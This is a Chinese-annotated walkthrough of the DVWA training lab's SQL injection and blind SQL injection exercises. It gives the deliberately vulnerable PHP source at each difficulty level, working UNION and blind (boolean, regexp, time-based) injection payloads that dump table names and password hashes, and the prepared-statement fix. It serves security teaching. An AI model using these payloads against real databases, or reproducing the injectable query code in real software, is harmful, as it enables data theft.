SQL Injection
Low
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) { ////mysqli_fetch_assoc()函数从结果集中取得一行作为关联数组
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?> 查询数据库:0' union select 1,database() # //dvwa
查表名:0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="dvwa") # //guestbook,users
查列名:0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users") # //user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
查数据: 0' union select group_concat(first_name,last_name),group_concat(password) from users #
得到:
First name: adminadmin,GordonBrown,HackMe,PabloPicasso,BobSmith
Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99
Medium
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?> Medium增加了mysqli_real_escape_string()函数对一些特殊字符进行转义
前端使用菜单对输入进行限制,但可以抓包处理
存在数字型注入
查询数据库:0 union select 1,database() # //dvwa
查表:0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) # //guestbook,users
查列名:0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273) # //user_id,first_name,last_name,user,password,avatar,last_login,failed_login
查数据:0 union select group_concat(first_name,last_name),group_concat(password) from users #
High
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>同样可以使用 0' union select group_concat(first_name,last_name),group_concat(password) from users # 直接手工注入
High级别中提交的页面与查询结果的页面并不是一个页面,这样的作用是为了防止一般的sqlmap注入
Impossible
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
// Make sure only 1 result is returned
if( $data->rowCount() == 1 ) {
// Get values
$first = $row[ 'first_name' ];
$last = $row[ 'last_name' ];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?> Impossible级别的代码已经使用了PDO技术有效的防止了SQL注入,同时Anti-CSRFtoken有效的防治了CSRF攻击
SQL Injection (Blind)
Low
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors //mysqli_num_rows()函数返回结果集中行的数目
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?> 下面给出几个不同方法:
猜测数据库名长度:1’ and length(database())=4 #
猜测数据库名第一位:1' and ascii(left(database(),1))>100 # //猜测数据库第一位为d
猜测数据库名第二位:1' and ascii(substr(database(),2,1))>118 # //猜测数据库第二位为v
猜测数据库第三位:1' and ord(mid(database(),3,1))>119 # //猜测数据库第三位为w,mid()和substr()类似
用了三种方法猜测数据库名,除此之外还有一些方法可取:
like匹配注入:1' and 1=(select database() like 'dv%') # //猜测数据库前两位位dv
regexp正则注入:1' and 1=(select database() regexp '^[a-e]') # //判断第一个字符是[a-e]中的字符
1' and 1=(select database() regexp '^d') # //确定第一个字符是d
1' and 1=(select database() regexp '^d[u-w]') # //判断第二个字符是[u-w]中的字符
之后就可以一次更换:'^dv[a-z]' -> '^dvw[a-z]' -> '^dvwa[a-z]'
基于时间的盲注:1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) #
猜测表的长度:1' and (select count(table_name) from information_schema.tables where table_schema="dvwa")=2 # //猜测表有2个
逐个猜测各个表名的长度:1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9 # //猜测第一个表长度为9
1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5 # //猜测第二个表长度为5
猜测第一个表名:1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # //猜测第一个表名的第一个字母为g
...
猜测第二个表名:1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>117 # //猜测第二个表名的第一个字母为u
...
类似的使用上述方法即可猜测出所有的表名和列名
Medium
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
//mysql_close();
}
?> 使用了mysqli_real_escape_string()函数,对输入进行限制。
注入方法类似
High
<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?> 使用cookie传送参数,同时使用sleep()函数扰乱时间盲注
Impossible
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
// Check the database
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?> Impossible级别的代码已经使用了PDO技术有效的防止了SQL注入,同时Anti-CSRFtoken有效的防治了CSRF攻击